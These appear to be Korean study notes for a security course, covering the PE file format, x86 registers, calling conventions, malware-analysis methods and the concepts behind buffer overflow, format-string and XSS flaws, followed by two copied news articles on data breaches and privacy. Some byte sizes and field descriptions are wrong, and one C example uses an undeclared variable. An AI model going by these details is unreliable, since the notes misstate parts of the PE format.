• 파일과 메모리의 파일 할당(alignment)이 다를 경우, 디스크상에서와 메모리상에서 사이즈가 조금씩 달라지기 때문에 이 빈 공간을 NULL로 채워버린다.
  • 즉, null공간으로 크기를 조절한다.
• 주소 할당 방식이 다른 이유는?
  • 메모리는 VA를 활용하고, PE는 RVA를 활용한 경우가 많음.
  • 이렇게 하는 이유는 만약 프로그램을 메모리로 옮기는 데 그 위치에 다른 프로그램이 이미 있을 경우, 다른 자리를 찾아야 하는데 자리를 변경 안 하면 정상적 실행 불가
  • 따라서, Relocation이 가능한 RVA로 프로그램을 운영해야 한다. 
  • 기준위치는 변해도 기준 위치에 대한 상대적 주소는 변하지 않기 때문에, 아무 문제없이 원하는 정보에 액세스 가능
  • VA(Virtual Address): 프로세스 가상 메모리의 절대주소
  • RVA(Relative Virtual Address(offset)): 어느 기준 위치(ImageBase)에서부터의 상대주소

 DOS HEADER

• Microsoft가 pe포맷을 개발할 때, 당시 쓰이던 DOS 파일에 대한 하위호환성을 좋게 설계함
• 따라서 PE헤더의 제일 앞부분은 기존 DOS EXE header를 확장한 'IMAGE DOS HEADER'로 만듦
  • IMAGE DOS HEADER = 기존 DOS EXE HEADER의 확장
• 여기서 제일 중요한 멤버는 e_magic과 e_ifanew
• 모든 파일은 시작 부분(e_magic)에 DOS signature("MZ", 마이크로소프트에서 DOS 실행파일을 설계한 주비코브스키의 영문 이니셜)가 존재한다.
• 그리고 e_lfanew 값이 가리키는 위치에 NT header 구조체가 존재해야 한다.

DOS Header & DOS stub

• 시작 부분에 e-magic("MZ")이 있고 헤더의 끝부분에 00 00 00 E0으로 e-lfanew가 설정되어 있는 걸 볼 수 있다.
  • NT header 구조체가 0x00 00 00 E0에 존재한다는 뜻
• DOS Stub은 헤더 바로 밑에 존재하는 부분인데, 없어도 파일 실행에는 문제가 없다.
• 윈도우에서 40~4D 영역까지, 즉 DOS Stub 첫 줄 21까지는 16비트 어셈블리 명령어
• 윈도우에서는 아예 이쪽 코드를 무시(32비트 기도 하고, PE에서는 실행 안됨), 근데 DOS 디버거로 실행하면 저 코드가 실행되며 저 문장이 출력되는 구조

DOS STUB - Rich Header

• Rich Header는 DOS Stub 부분에 담겨져 있고 컴파일러나 링커 정보가 담겨있음.
• 실행파일의 악성 유무를 판단할 때는 사용하지 않으나, 컴파일러나 링커를 통해 공격그룹을 분류할 수 있음
• Rich identifier 이전까지의 부분을 checksum과 XOR 연산 시 여러 정보를 얻을 수 있음

https://wogh8732.tistory.com/212

 https://swpose.tistory.com/4

NT HEADER

• 본격적인 PE Header로 PE Header는 IMAGE_NT_HEADER 구조로 이루어져 있고, 총 3개의 멤버로 되어 있다.
  • 시그니처
  • File Header
  • Optional Header
• 시그니처는 "PE00"으로 시작하는 4바이트 길이의 문자열

NT HEADER(File Header)

1. Machine

• CPU별로 고유한 값을 가지고 Intel 386 호환 칩은 014c의 값이다.
• 리틀 앤디안 방식: 저장할 때 하위 바이트, 즉 작은 쪽을 먼저 저장하는 방식
• 컴퓨터에 int형 4바이트 데이터 0x01 02 03 04를 저장한다고 생각하면, 리틀 앤디안 방식으로는 메모리에 04 03 02 01 순으로 저장된다.
• Intel 기반 윈도우는 리틀 앤디안 방식을 사용하고 바꾸서 4C 01 이렇게 되어있다.
• 그러므로, Intel 386 호환 칩에 맞는 프로그램이다.

2. NumberOfSections

섹션의 개수를 나타내는 부분

3. SizeOfOptionalHeader

• IMAGE_NT_HEADERS의 마지막 멤버인 IMAFE_OPTIONAL_HEADER 구조체의 크기를 나타내는 부분
• PE파일은 코드, 데이터, 리소스 같은 것들이 각각 섹션에 나뉘어서 저장되는데 이 부분은 그 섹션이 몇 개인지 나타내는 부분
• 이 부분은 0보다 커야 하고 정의된 섹션 개수랑 실제 섹션 개수가 다르면 에러가 난다.
  • 0보다 작으면 실행이 안됨, 섹션이 없는 것
  • 혹은 정의된 섹션 개수가 실제 섹션 개수보다 적으면 뒷부분 섹션이 인식되지 않기도 함
• SizeOfOptionalHeader의 경우는 optional header의 크기를 명시하는 부분인데, 32비트 파일인지, 64비트 파일인지를 표시하기 위해 사용되는 부분

4. Characteristics

• 파일의 속성을 나타내는 값. 
• 실행이 가능한지, DLL 파일인지 등의 정보들이 bit OR 형식으로 저장됨
• DLL이나 OBJ 파일처럼 셸에서 실행이 되지 않고 서비스나 디버거로 실행하는 경우
  • 0002h, 즉 IMAGE_FILE_EXECUTABLE이 없는 경우가 있을 수 있음
• TIMESTAMP라는 멤버는 해당 파일이 빌드된 시간을 나타내는 값이고, 파일 실행에 영향을 미치지 않음
• 실제 침해사고에서 파일의 생성시점이나 침투시점으로 시간을 추적할 때는 사용될 수 있지만, 인공지능 제작에는 별달리 feature로 사용되지 않음

• Machine: 4byte → 01 4C(32bit Intel 386 호환 칩)
• NumberOfsctions: 4byte → 00 03(3개)
• Timestamp: 8byte → 41 10 7C C3
• Offset to Symbol table: 8byte → 00 00 00 00
• Number of Symbols: 8byte → 00 00 00 00
• Size of Optional Header: 4byte → 00 E0
• Characheristics: 4byte → 01 0F
  • IMAGE_FILE_RELOCS_STRIPPED  0x0001
  • IMAGE_FILE_EXECUTABLE_IMAGE  0x0002
  • IMAGE_FILE_LINE_NUMS_STRIPPED  0x0004
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED  0x0008
  • IMAGE_FILE_32BIT_MACHINE  0x0100
  • → 1+2+4+8+=15 (16진수 변환 시 0F로 변환됨)

NT HEADER(Optional Header)

• Magic 넘버는 32비트는 10B의 값을, 64비트는 20B의 값을 가짐
• AddressOfEntryPoint의 경우, EP의 RVA(상대주소)를 나타낸 건데, EP는 프로그램에서 최초로 실행되는 코드의 시작 주소임.
  • 따라서, 프로그램의 시작점으로 매우 중요한 값

• EXE, DLL 파일은 user memory 영역인 0~7FFFFFFF 범위에 로딩
• SYS는 커널 메모리 영역인 80000000~FFFFFFFF 범위에 로딩
• PE 로더는 PE파일을 로딩할 때, 프로세스를 생성하고 파일을 메모리에 로딩한 다음 EIP 레지스터 값을 ImageBase+AddressOfEntryPoint 값으로 세팅함
• ImageBase는 PE파일이 메모리에서 로딩되는 시작 주소를 나타냄
  • 일반적인 개발도구가 만든 exe 파일의 ImageBase는 00400000이고, DLL은 10000000 임.
• EIP 레지스터: Extended Insturction Pointer
  • CPU가 처리할 명령의 주소를 나타냄
  • 다음엔 어딜 가서 뭘 하지?를 나타내는 레지스터
  • 해당 PE가 시작되도록 CPU의 다음 처리지점을 PE파일의 시작점으로 옮겨주는 것

• 파일에서 섹션의 최소단위를 나타내는 건 FileAlignment
• 메모리에서 섹션의 최소단위를 나타내는 건 SectionAlignment
• 두 값은 같을 수도, 다를 수도 있으며 파일/메모리의 섹션 크기는 반드시 FileAlignment / SectionAlignment의 배수여야 함

• SizeOfImage: PE 파일이 메모리에 로딩되었을 때 가상 메모리에서 PE Image가 차지하는 크기
  • 일반적으로 파일 크기(size)와 PE 이미지가 메모리에 로딩된 크기(SizeOfImage)는 다름
• SizeOfHeaders: PE 헤더의 전체 크기, FileAlignment의 배수
  • 파일 시작지점에서 SizeOfHeader의 길이만큼 떨어진 지점에 첫 번째 섹션이 위치함
  • 헤더 다음에 섹션이 나온다는 걸 생각해 보면 됨

• Subsystem: 이 subsystem의 값으로 시스템 드라이버 파일(.sys)인지 일반 실행 파일(.exe, .dll)인지 구분 가능
  • 표는 sybsystem 값에 따라 구분되는 것들
    • 1이면 시스템 드라이버와 같은 sys파일
    • 2면 메모장 같은 창 기반 애플리케이션
    • 3이면 cmd 같은 콘솔 기반 애플리케이션
• NumberOfRvaAndSizes: 바로 다음 멤버인 DataDirectory 배열의 개수를 나타냄
  • 맨 위에 Define으로 개수가 16으로 정의되어 있지만, 로더는 이 변수로 배열 크기를 인식함.

• DataDirectory: IMAGE_DATA_DIRECTORY 구조체의 배열
  • 배열의 각 항목마다 정의된 값을 가짐
  • 여기서 EXPORT, IMPORT, RESOURCE, TLS Directory가 중요한데, 그중에서도 EXPORT, IMPORT DIRECTORY가 특히 중요하다!

어셈블리어

• JMP와 CALL은 둘 다 프로그램 실행 흐름이 변경되다는 것은 동일하나,
• JMP는 해당 주소로 가는 것
• CALL은 해당 함수를 호출하며 이동한 후, 끝나면 원래 주소로 돌아옴

비트연산자

비트 시프트 연산

• SHL(Shift Left, 왼쪽 시프트)
  
  • 5 << 2는 숫자 5를 왼쪽으로 2번 시프트 하는 연산
  • 5는 2진수로 101이다.
  • 101 << 2 = 10100
    • 즉, 101에서 왼쪽으로 2번 이동하여, 빈자리는 0으로 채워진다.
• SHR(Shift Right, 오른쪽 시프트)
  • 6 >> 1은 숫자 6을 오른쪽으로 1번 시프트 하는 연산
  • 6은 2진수로 110이다.
  • 110 >> 1 = 0011
    • 즉, 110에서 오른쪽으로 1번 이동하며, 빈자리는 0으로 채워진다.

레지스터

CPU

• 시스템의 중앙에서 모든 계산과 명령 처리를 담당
• Interrupt line: 각 장치나 작업에서 발생하는 인터럽트를 CPU로 전달하는 통로입니다. 인터럽트는 CPU의 작업을 잠시 멈추고 즉시 처리해야 할 작업이 있을 때 사용
• Mode bit 및 Registers: CPU는 여러 모드에서 작업을 수행할 수 있습니다. Mode bit는 CPU가 현재 어떤 모드(사용자 모드 또는 커널 모드)로 작동하는지를 나타내며, 레지스터는 계산에 필요한 임시 데이터를 저장하는 고속 기억 장치

Memory Controller (메모리 제어기)

• CPU와 메모리 간의 데이터 이동을 관리합니다. CPU가 메모리에 접근할 수 있도록 중간에서 조정하는 역할

Memory (메모리)

• 시스템 메모리는 운영 체제(OS)와 사용자 프로그램을 저장
• CPU는 메모리에서 데이터를 읽고 쓰며, 프로그램 실행에 필요한 데이터를 가져온다

DMA Controller (직접 메모리 접근 제어기)

• CPU를 거치지 않고도 메모리와 장치 간에 직접 데이터를 전송할 수 있도록 도와주는 장치입니다. 이를 통해 CPU는 다른 작업에 집중할 수 있고, 데이터 전송은 효율적으로 이루어집니다
• Timer는 작업의 시간을 측정하거나 일정 시간 이후에 작업을 실행하는 데 사용

Device Controller (장치 제어기)

• CPU와 주변 장치(디스크, 프린터, 키보드, 모니터 등) 간의 데이터를 중재
• 각각의 장치에는 고유의 Device controller가 있고, 이를 통해 장치가 CPU의 명령을 받아 실행

Disk, Printer, Monitor 등 장치

• Disk: 데이터가 저장되는 곳으로, CPU의 명령에 따라 데이터를 읽고 씁니다.
• Printer: CPU의 명령에 따라 인쇄 작업을 수행하는 장치입니다.
• Local buffer: 장치 제어기나 주변 장치가 데이터를 임시로 저장하는 공간입니다. 장치에서 데이터를 전송하거나 받을 때 사용됩니다.
• Monitor: 사용자에게 데이터를 시각적으로 보여주는 장치입니다.

1. 산술연산에 사용되는 범용레지스터

• EAX (Extended Accumulator Register): 곱셈과 나눗셈 명령에서 자동으로 사용되고 함수의 리턴값이 저장되는 용도로 사용 → 산술 연산에 사용
• EBX (Extended Base Register): ESI나 EDI와 결합하여 인덱스에 사용 → 특정 주소 저장
• ECX (Extended Counter Register): 반복 명령어 사용 시 반복 카운터로 사용 → 숫자를 카운터 할때 사용되거나, 계산할 때 임시 저장
• EDX (Extended Data Register): EAX와 같이 쓰이며 부호 확장 명령 등에 사용 → 일반 자료 저장

2. 인덱스 레지스터

• 인덱스로 사용, 그 외에도 매개변수로써의 역할도 한다.
• RDI (Destination Index): 문자열 관련 instruction 사용 시, Destination
• RSI (Extended Sorce Index): 문자열 관련 instruction 사용 시, Source

3. 포인터 레지스터

• RSP (Stack Point): 스택프레임에서 스택의 끝 지점 주소(현재 스택 주소)가 저장된다.
  
  • 즉, 데이터가 계속 쌓일 때 스택의 가장 높은 곳을 가리킨다.
  • push, pop 명령을 통해 RSP 값이 위아래로 8바이트씩 이동하면서 스택프레임의 크기를 변경하게 된다.
• RBP (Base Point): 함수가 호출되면 스택프레임이 형성되는데 이 스택프레임의 시작 지점 주소(스택 복귀 주소)가 저장된다.

디버거

함수 호출 구조

• 코드 세그먼트: CPU에서 실행되는 바이트 코드를 담고 있음
• 데이터 세그먼트
  • 문자열 상수 목록: 프로그램을 작성하다가 큰따옴표로 묶은 문자열을 담고 있는 공간
  • 전역 변수: 함수 외 바깥에서 선언한 변수를 관리하는 공간
  • static 변수: 전역 변수의 특성과 지역 변수의 특성을 고루 갖춘 static으로 선언된 변수를 관리하는 공간
• 엑스트라 세그먼트
  • 힙 (Heap): 동적 할당으로 메모리를 할당 받았을 때 사용하는 공간
  • 스택 (Stack): 코드 상에 드러나 있는 메모리(변수 등)를 관리하는 공간

#include <stdio.h> 

void funcA(int v){ 
	printf("%d\n", b); 
} 

void funcB(int* v){ 
	printf("%d\n", *v); 
} 

int main(void){ 
	int num; num = 5; 
	funcA(num); 
	num = 13; 
	funcB(&num); 
	return 0; 
}

• 각 함수 호출 시 스택에서 발생하는 상황
  
  • 함수가 호출될 때마다 스택에 새로운 정보가 쌓인다.
  • 함수가 끝나면 스택에서 그 함수에 대한 정보가 제거된다.
• 스택 구조의 계층
  • 상위에 있는 데이터가 가장 최근에 추가된 함수나 변수에 대한 정보를 담고 있다.
  • 스택의 내용은 함수 호출 순서대로 관리되며, 각 함수가 호출될 때 그에 관련된 정보(매개변수, 반환 주소 등)가 스택에 저장된다.
• 구체적인 스택 동작
  • main() 함수가 실행될 때, main 함수에 대한 정보가 스택에 쌓인다.
  • funA(num) 호출 시, funA 함수에 대한 정보와 매개변수 int v가 스택에 저장된다.
  • funB(&num) 호출 시, funB 함수에 대한 정보와 매개변수 int* v가 저장된다.
• 스택에서의 변수 처리
  • funcA는 num의 값을 복사하여 스택에 저장하고, 값을 직접 출력한다.
  • funcB는 num의 주소를 전달받아 그 주소에 저장된 값을 역참조(*v)하여 출력한다.
• 코드 실행 흐름
  • funcA(num)에서는 num의 값(5)이 스택에 저장되고 출력된다.
  • funcB(&num)에서는 num의 주소가 스택에 저장되며, 그 주소를 참조해 13이라는 값이 출력된다.

함수 호출 규약

• 함수가 호출되기 전, 함수에 전달될 파라미터는 스택에 저장된다.
• 함수가 실행되고 나면, 파라미터는 여전히 스택에 남아있지만, 이후의 스택 사용에 의해 덮어쓰일 수 있습니다.
• 프로세스의 실행과 동시에 스택 메모리의 크기가 결정됩니다. 즉, 각 프로그램마다 스택 메모리의 크기가 다르게 설정되며, 이 크기 내에서 함수 호출 시 필요한 데이터를 저장합니다.
• 함수가 끝난 후에도 스택에 있던 파라미터는 사라지지 않고 남아있습니다. 다만, 다음 번에 스택에 새로운 값이 저장될 때 덮어쓰여서 사라지게 됩니다. 이는 스택이 LIFO(Last In, First Out) 방식으로 동작하기 때문입니다.
• 함수 호출 시 ESP(Extended Stack Pointer)는 함수 호출 전의 위치로 복원되어야 합니다. ESP는 스택의 최상단을 가리키는 포인터로, 함수가 끝나면 함수 호출 전에 있던 위치로 돌아와야 정상적으로 스택을 계속 사용할 수 있습니다.
• 만약 ESP가 복원되지 않으면 스택 메모리가 꼬이게 되어 더 이상 스택을 사용할 수 없게 됩니다.
• 함수 호출 규약은 함수 호출 시 어떻게 파라미터를 전달하고, ESP를 복원할 지를 정의하는 규칙입니다. 이 규칙에 따라 스택의 관리 방식이 달라집니다.

cdecl

: 함수를 호출한 caller인 main함수가 자신이 스택에 입력한 함수 파라미터를 직접 정리하는 방식

stdcall

: 호출된 callee인 add함수가 함수 내부에서 스택을 정리하는 방식(cdecl에 비해 코드 크기가 작아짐)

fastcall

: 기본적으로 동일하나, 함수에 전달하는 파라미터의 일부(2개까지)를 스택메모리가 아닌 레지스터로 전달함

(어떤 함수의 파라미터가 4개일 경우, 앞 두 개는 각각 ECX, EDX 파라미터로 전달함)

thiscall

: 매개변수를 스택으로 저장하고, this 포인터를 사용해 그것들을 연결하는 방식

this 포인터는 ecx에 저장됨. 나머지 규칙은 stdcall과 동일함

악성코드

• 의도적으로 컴퓨터 사용자에게 피해를 주고자 만든 악의적인 프로그램
• 기존의 트로이목마, 애드웨어, 백도어, 루트킷 등의 악성코드에 더해, 최근에는 금전적 목적을 주로 드로퍼, 다운로더, 키로거, 마이너, 랜섬웨어 등 다양한 형태로 진화해 나가고 있음

관련 프로그램

머신러닝 관련: 코랩

https://sean.tistory.com/380

http://wjradburn.com/software/(PEView)

https://www.winitor.com/download(pestudio)

악성코드 분석 방법의 갈래

정적 분석

• 파일을 실행하지 않고 파일의 종류(exe, dll, doc, zip 등), 크기, 헤더(PE) 정보, Import/Export API, 내부 문자열, 실행 압축 여부, 등록 정보, 디버깅 정보, 디지털 인증서 등의 다양한 내용을 확인하는 것
• 디스어셈블러도 정적분석의 일부로 본다.

동적 분석

• 파일을 직접 실행시켜서 행위를 분석하고, 디버깅으로 코드 흐름과 메모리 상태 등을 자세히 살펴보는 것
• 파일, 레지스트리, 프로세스, 네트워크 등을 관찰하며 행위를 분석하고, 디버거를 이용해 프로그램 내부 구조와 동작 원리를 분석하기도 함

패킹 여부 확인(by. PEID), 자동화 분석(by. Cuckoo, Hybrid analysis 등)

• s/w가 리버스엔지니어링을 막기 위해 암호화하거나 실행파일을 압축하여 소스코드를 볼 수 없게 만드는 것 = 패킹
• 정적 분석: PEView, VirusTotal, strings, Dependency Walker, Resource Walker
  • IDA 같은 디스어셈블러로 내부 코드로 구조를 보는 건 고급 정적분석으로 분류
• 동적 분석: process monitor, RegShot, process explorer, wireshark, SysAnalyzer
  • Ollydbg, x64dbg 같은 디버거로 프로그램 내부 구조와 동작원리를 보는 걸 고급 동적분석으로 분류

• 메타데이터(Metadata): 기본적인 파일정보와 PE정보
• 정적정보(Static Info): 개발경로 및 문자열 등 코드 내에서 확인 가능한 정보
• 동적정보(Dynamic Info): 레지스트리, 프로세스 등 악성코드 실행 시 동작하는 주요 행위 정보
• 네트워크(Network): 악성코드 실행 시 접속 시도 및 파일/메모리 내 포함된 URL/IP
• ATT&CK Matrix: 악성코드를 전략, 전술 별(TTPs) 행위를 기술단위 별로 추출한 정보
• 기타 정보(ETC): 악성코드 함수 단위 등의 정보와 악성 문서에 대한 정보

https://github.com/a-tartarelli/malware-detection

https://github.com/OmerFarukKurklu/cnn-malware-classification

01. Python 기초

• python 설치
• Visual Studio Code 설치

02. 모듈, 프레임워크

모듈이란?

• 함수나 변수 또는 클래스를 모아 놓은 파이썬 파일
• 다른 파이썬 프로그램에서 불러와 사용할 수 있도록 만들어짐
• 모듈 < 패키지 < 라이브러리

프레임워크 Framework

• FRAME + WORK = 프레임(틀, 규칙, 법칙) + 워크(일, 소프트웨어의 목적)
• 프로그래밍에서 특정 운영 체제를 위한 응용 프로그램 표준 구조를 구현하는 클래스와 라이브러리 모임
• 목적에 따라 고민할 필요 없이 이용할 수 있도록 일괄로 가져다 쓰도록 만들어 놓은 틀

SQL

Structured Query Language: 구조화된 쿼리 언어

• 관계형 데이터베이스에 정보를 저장하고 처리하기 위한 프로그래밍 언어
• 관계형 데이터베이스란?
  • 정보를 표 형식으로 저장하며, 행과 열은 다양한 데이터 속성과 데이터 값 간의 다양한 관계를 나타내는 것
• SQL 문(query)을 사용하여 데이터베이스에서 정보를 저장, 업데이트, 제거, 검색 가능

SQL 주요 구문

SQL 실습

https://school.programmers.co.kr/learn/challenges?tab=sql_practice_kit

복습에 도움이 될 만한 인터넷 자료

• python
  • 파이썬 기초 문법
  • 모듈, 패키지, 라이브러리, 프레임워크 개념
• 모듈, 라이브러리, 프레임워크 자세히 살펴보기
  • pynput
  • matplotlib
  • flask
• 간단한 키로거 동작 원리
• SQL 개념 및 실습

01. C언어와 해킹

https://www.ciokorea.com/news/327256

• C와 C++은 메모리 안전 취약점이 없는 프로그래밍 언어 = 사이버 공격에 취약
• C와 C++은 임베디드 시스템에 많이 사용되므로 C와 C++ 활용이 그저 중단되기보다는 대안을 향한 진화가 가속화될 것

02. BOF 취약 함수

• 이러한 함수들은 사용자로부터 입력을 받을 때, 입력 크기에 대한 제한을 두지 않아 버퍼 오버플로 공격에 취약하다.
• 즉, 입력 값이 너무 클 경우 버퍼를 넘어서 메모리 영역을 침범할 수 있어, 시스템을 공격하는 데 악용될 수 있다.

03. 포인터

1. 포인터 개념

• int num; : 정수형 변수 선언
• &num: 이 변수의 메모리 주소
• printf("%p\n", &num); : num 변수의 주소값을 출력
  
  • %p는 포인터(주소값)을 출력할 때 사용하는 서식
• 메모리는 여러 칸으로 나누어져 있고, 각 칸에는 특정한 데이터가 저장된다.
  • num 변수도 메모리의 특정 위치에 저장되며, 이 위치의 주소는 &num 이다.

2. 주소값을 알면 위험할까?

• 주소값을 알면 메모리의 특정 위치에 직접 접근할 수 있다.
• 만약 주소값을 악의적인 코드에서 이용하면, 그 위치에 저장된 데이터를 조작하거나 다른 중요한 데이터를 훔쳐볼 수 있다. = 메모리 해킹

04. FORMAT STRING

• printf(str);은 입력받은 문자열을 그대로 출력하는데, 포맷 문자열 취약점이 발생할 수 있습니다. 사용자가 잘못된 포맷 문자열을 입력할 경우 예상치 못한 결과가 나올 수 있습니다.

05. JAVASCRIPT

• HTML: 웹 페이지의 구조를 정의하는 마크업 언어
• CSS: 웹 페이지의 스타일을 지정하는 스타일시트 언어
• JavaScript: 웹 페이지의 동적인 기능을 추가하는 프로그래밍 언어

https://ko.javascript.info/

06. XSS

• XSS 공격은 사용자가 신뢰하는 웹 사이트에 악성 스크립트를 삽입하여, 사이트를 방문하는 다른 사용자에게 피해를 입히는 기법입니다.
• XSS를 통해 사용자의 쿠키, 세션 정보 등이 탈취될 수 있으며, 이를 방지하기 위해서는 웹사이트의 입력값을 철저히 검증하고 필터링해야 한다.

기사 원문

개인정보 암호화한 11자리 ‘홈넘버’ 활용, 배송과정 고객 개인정보 노출 최소화

[보안뉴스 박미영 기자] 롯데홈쇼핑은 고객 개인정보 보호를 위해 운송장에서 고객 이름, 연락처를 제거한 ‘보안택배 서비스’를 업계 최초로 도입했다.

최근 유통업계의 고객 개인정보 유출 사례가 늘고 있다. 외부 해킹은 물론 시스템 오류, 휴먼 에러 등 다양한 경로로 개인정보 유출 피해가 발생해 소비자의 불안감이 증폭되고 있다.

롯데홈쇼핑은 2013년 택배 운송장에 주문자의 실제 연락처 대신 가상 전화번호를 부여해 고객 연락처 유출을 방지하는 ‘안심번호 서비스’를 시행했다. 이어 2017년 전화 상담 주문 시스템에 일회용 보안 토큰 결제 기술을 적용한 간편 결제 서비스를 도입하는 등 고객 개인정보 보호를 위한 시스템을 선도적으로 도입해 왔다.

롯데홈쇼핑은 보안 체계를 고도화해 고객 정보 유출 사고를 사전에 방지하기 위해 업계 최초로 고객 이름, 연락처를 제거한 ‘보안택배 서비스’를 도입했다.

‘보안택배 서비스’는 개인정보 대신 이름, 연락처 등의 정보를 암호화한 ‘홈넘버’를 입력해 온라인으로 구매한 상품을 배송받을 수 있는 서비스다. 보안 솔루션 업체 ‘홈넘버 메타’가 개발한 서비스로, 택배 운송장에 고객 이름·연락처 대신 개인별 식별번호인 ‘홈넘버’를 부여해 개인정보 노출로 인한 피해를 방지할 수 있다. ‘보안택배 서비스’ 이용을 희망하는 고객은 롯데홈쇼핑 모바일앱에서 주문 후 배송 방법으로 ‘보안택배’를 선택하고 ‘홈넘버’에 가입하면 된다. 택배 운송장에는 가입 후 발급받은 ‘홈넘버’가 보이며, 이를 통해 본인의 주문 상품 여부를 확인할 수 있다. 향후 이름·연락처뿐만 아니라 주소지도 ‘홈넘버’에 포함해 고객 정보보안을 더욱 강화할 예정이다.

한편, 롯데홈쇼핑은 개인정보 보호의 중요성을 인지하고, △개인정보 보호 교육을 통한 임직원 보안의식 내재화 △고객 개인정보 처리 시스템 구축 △취약점 진단 및 모의해킹 정기 이행 △파트너사 대상 개인정보 보호 현황 정기 점검 등을 통해 정보보안 강화를 위해 노력하고 있다.

조영구 롯데홈쇼핑 정보보안실장은 “개인정보 유출 문제가 심각해지며 소비자 불안이 심화되고 있는 가운데 업계 최초로 고객의 이름, 연락처 없이 상품을 배송하는 ‘보안택배 서비스’를 도입하게 됐다”며, “향후 고객 개인정보 보호를 강화를 위한 다양한 제도와 서비스를 마련해 기업 신뢰도를 높여 나가겠다”라고 말했다.

출처:[박미영 기자(mypark@boannews.com)]

기사 원문

• 출처: 조광형 기자
• 이화여대 "3일 통합정보시스템 해킹 피해 확인"
• 연락처·주민번호 등 외부서 조회 ‥
• 파장 커질 듯학교 측 "보안점검 강화, 재발방지책 마련할 것"

이화여자대학교 통합정보시스템이 '해킹 공격'을 받아 일부 졸업생(1982~2002년 입학)들의 연락처·주민등록번호 등 개인 신상정보가 외부로 유출되는 사건이 발생했다.

김은미 이화여대 총장은 지난 4일 이화여대 졸업생들에게 보낸 공지문에서 "학교는 최근 내부 보안시스템을 통해 통합정보시스템에 대한 비정상적인 접근 시도를 인지하게 됐고, 현재 점검 중에 있음을 알려드린다"고 밝혔다.

김 총장은 "전날인 9월 3일 실시간 모니터링 중 '해외 IP'의 비정상적 접근을 감지했다"며 "이에 오전 11시 55분경 즉각적으로 보안시스템을 통해 비정상적 접근을 차단했고, 만에 하나 있을 수 있는 피해가 발생했는지 상세 조사를 하고 있다"고 밝혔다.

"접근 시도 대상은 1982학년도에서 2002학년도에 입학한 졸업생이며 대부분 20여 년 간 업데이트되지 않은 정보"라고 설명한 김 총장은 "보안시스템의 사전 차단으로 재학생 데이터 관련 접근 시도는 없었다"고 덧붙였다.

김 총장은 "학교는 이번 사안의 심각성을 엄중하게 인식하고 있고, 현재 내부 시스템 점검 및 강화, 유관기관과의 협력 등을 통해 추가적인 피해 가능성을 차단하고 있다"며 "개인정보 유출 여부가 확인될 경우 즉시 통지하고, 주의사항 안내, 관련된 피해 상담 등을 하는 민원센터를 운영해 최대한 신속하게 안내하도록 하겠다"고 밝혔다.

이어 "졸업생들은 개인정보 보호를 위해 의심스러운 이메일과 문자메시지 또는 전화를 통한 피싱 시도에 주의하시고, 개인정보로 추측 가능한 비밀번호를 사용하시는 경우 비밀번호를 변경하시기를 권장드린다. 동창 여러분께 심려를 끼쳐드려 죄송하다"고 사과했다.

이화여대에서 정보침해대응단 위원장을 맡고 있는 신경식 연구·대외부총장은 6일 학교 홈페이지에 올린 추가 공지 글에서 "학교는 통합정보시스템에 대한 비정상적인 접근 시도를 인지한 직후부터 면밀한 조사와 보안 분석을 진행한 결과, 통합정보시스템이 해킹 공격을 받아 일부 졸업생 여러분의 개인정보가 외부에서 조회된 사실을 확인했다"고 밝혔다.

신 부총장은 "지난 3일 불법 시도 감지 후 즉각적으로 비정상적인 접근을 차단했으나, 안타깝게도 지난 5일 오전 11시 경 1982학년도에서 2002학년도에 입학한 졸업생 일부의 성명, 주민등록번호, 연락처, 이메일주소, 주소, 학적정보 등과 이들 졸업생 일부의 보호자 정보가 유출된 것을 확인했다"고 부연했다.

이어 "유출된 정보에는 성적이나 재학생 관련 정보는 포함돼 있지 않다"고 덧붙인 신 부총장은 "이번 공격은 보안시스템이 사전에 감지하기 어려운 것이었으나, 담당자 모니터링을 통해 선제적으로 접속을 차단함으로써 피해를 최소화할 수 있었다"고 강조했다.

신 부총장은 "학교는 신속히 교육부와 개인정보보호위원회에 신고를 진행했고, 추가 피해가 발생하지 않도록 기관에 적극 협조 및 대응하고 있다"며 "현재까지 본 사고에 따른 개인정보 악용 의심 사례는 없는 것으로 파악되나, 혹시 모를 피해를 방지하기 위해 출처가 불분명한 이메일, 문자 및 연락 등을 수신하시는 경우 민원센터(02-3277-5501, privacy@ewha.ac.kr)로 연락 주시면 성실하게 상담해 드리도록 하겠다"고 공지했다.

신 부총장은 "이와 같은 일이 다시 일어나지 않도록 사고 원인을 면밀하게 분석해 시스템 점검, 보안시스템 강화, 주기적인 보안점검을 강화하고 재발방지 대책을 철저히 마련하겠다"며 "졸업생 여러분께 우려를 끼쳐드린 점 다시 한번 사과드린다"고 밝혔다.